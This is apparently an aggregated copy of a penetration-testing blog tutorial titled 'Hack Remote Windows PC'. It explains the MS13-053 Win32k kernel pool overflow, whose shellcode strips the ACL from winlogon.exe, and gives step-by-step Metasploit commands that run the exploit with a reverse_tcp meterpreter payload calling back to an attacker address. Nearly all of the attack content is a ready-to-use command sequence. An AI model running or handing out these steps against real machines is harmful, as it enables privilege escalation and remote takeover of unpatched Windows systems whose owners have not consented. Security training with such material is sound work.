Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

Hack Remote Windows PC using Windows NT User Message Call Win32k Kernel Pool Overflow (Schlamperei)

$
0
0

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome’s sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms13_053_schlamperei

msf exploit (ms13_053_schlamperei)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms13_053_schlamperei)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (ms13_053_schlamperei)>set session 2

msf exploit (ms13_053_schlamperei)>exploit


Viewing all articles
Browse latest Browse all 812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>